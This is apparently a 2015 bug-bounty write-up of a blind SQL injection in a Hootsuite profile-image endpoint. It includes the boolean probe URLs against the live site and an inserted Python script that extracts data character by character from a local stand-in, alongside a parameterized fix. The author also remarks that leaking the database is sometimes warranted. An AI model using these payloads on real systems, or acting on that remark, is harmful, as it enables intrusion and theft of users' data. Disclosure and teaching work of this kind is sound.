Saturday, August 1, 2015

Blind SQL injection [Hootsuite]

Hi, I will start publishing some of my findings.

In 2014 I found a blind SQL injection on a Hootsuite subdomain (https://learn.hootsuite.com).

Blind SQL Injection:
 A type of SQL injection attack that asks the database true or false questions and determines the answer from the application's response. Nothing from the database is echoed back in the page; data is recovered one bit (or one character) at a time from the difference between the "true" and "false" responses. It is typically used when the web application is configured to show only generic error messages (or none at all) but has not fixed the code that is vulnerable to SQL injection.

When I signed up for a new account and explored the site, I saw that user photos were served by a PHP file that returns the profile image.

I copied the link and opened it.


It worked and the photo displayed correctly.

Let's do some magic.


The page was white, totally white!!

This looked like SQLi. I did many tests and found out that it was a blind SQL injection.

For example, you can do a simple test:

1- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=1

OK!! (the image is returned)

2- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=2

Error!! (blank page)
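As an added example (not code from the original post, and not Hootsuite's code), the following Python script reproduces the 1=1 / 1=2 test above against a constructed in-memory SQLite stand-in for view_profile_image.php, then automates what sqlmap does in boolean-based blind mode: it recovers a string one character at a time using only "image returned" versus "blank page" as the answer. The table and column names, the ids, the image bytes and the `secret` table are all invented for the demo (on MySQL you would extract `database()` instead). The hardened variant beside the vulnerable one shows the same endpoint with the id validated and bound as a parameter; against it the oracle yields nothing.

```python
import sqlite3
from typing import Callable, Optional

# Constructed stand-in for the vulnerable endpoint: an in-memory SQLite database
# with a users table (id -> profile image) and a table holding the name we will
# extract blind. Illustrative only; not Hootsuite's code or schema.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, image BLOB)")
_conn.executemany("INSERT INTO users VALUES (?, ?)",
                  [(8807, b"\xff\xd8\xff\xe0JFIF-bytes"), (1, b"\x89PNG-bytes")])
_conn.execute("CREATE TABLE secret (name TEXT)")
_conn.execute("INSERT INTO secret VALUES ('hootsuite_u_v2')")

App = Callable[[str], Optional[bytes]]


def view_profile_image_vulnerable(id_param: str) -> Optional[bytes]:
    """Mimics view_profile_image.php?id=...: the id is concatenated into the SQL.
    Any error or empty result yields None, i.e. the 'totally white' page."""
    sql = "SELECT image FROM users WHERE id=" + id_param
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def view_profile_image_fixed(id_param: str) -> Optional[bytes]:
    """Hardened version: validate the type, then bind the value as a parameter."""
    try:
        image_id = int(id_param)
    except ValueError:
        return None
    row = _conn.execute("SELECT image FROM users WHERE id=?", (image_id,)).fetchone()
    return row[0] if row else None


def oracle(app: App, condition: str) -> bool:
    """Ask one true/false question: does the image still come back when
    `condition` is ANDed onto a known-good id (8807 in the write-up)?"""
    return app(f"8807 and ({condition})") is not None


def is_injectable(app: App) -> bool:
    """The manual 'and 1=1' versus 'and 1=2' test, automated."""
    return oracle(app, "1=1") and not oracle(app, "1=2")


def blind_extract(app: App, expr: str, max_len: int = 64) -> str:
    """Recover the string value of SQL expression `expr` one character at a
    time. Each character costs about seven yes/no questions (binary search
    over the ASCII range); the length is probed with length(expr) >= pos."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(app, f"length({expr}) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(app, f"unicode(substr({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    for name, app in (("vulnerable", view_profile_image_vulnerable),
                      ("fixed", view_profile_image_fixed)):
        print(name, "injectable:", is_injectable(app),
              "extracted:", repr(blind_extract(app, "(SELECT name FROM secret)")))
```

Against the vulnerable function the 14-character name comes back in roughly a hundred requests, which is why a blind injection with no visible output is still a full database read; against the fixed function every injected id fails integer validation before it reaches SQL, so both the 1=1 and 1=2 probes return the blank page and the oracle learns nothing.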

I did not have much experience in SQLi at that time, so I used sqlmap to confirm whether it was blind or not.

Type: boolean-based blind
Database: hootsuite_u_v2

So I was right.

I made a report and sent it with all the info and details.

I got

I was surprised that a security team does not know what SQL injection is; I sent the file, parameter, payload, and type.

After many messages and replies they fixed the SQLi in months and blocked me, I think!! because they told me they would see if they could add me to the hall of fame. I waited and nothing happened; I tried to contact them but got no reply, so I left them.

Sometimes you should do bad things like leak the DB!!!
There were 10k users or 100k, I do not remember.
That is all.

Thanks for reading.

 Useful links :
1- https://www.owasp.org/index.php/Blind_SQL_Injection
2- https://en.wikipedia.org/wiki/SQL_injection 
3- https://www.acunetix.com/websitesecurity/blind-sql-injection/
4- https://hackerone.com/reports/21899
5- There are many cool articles and write-ups about SQLi you can look for.

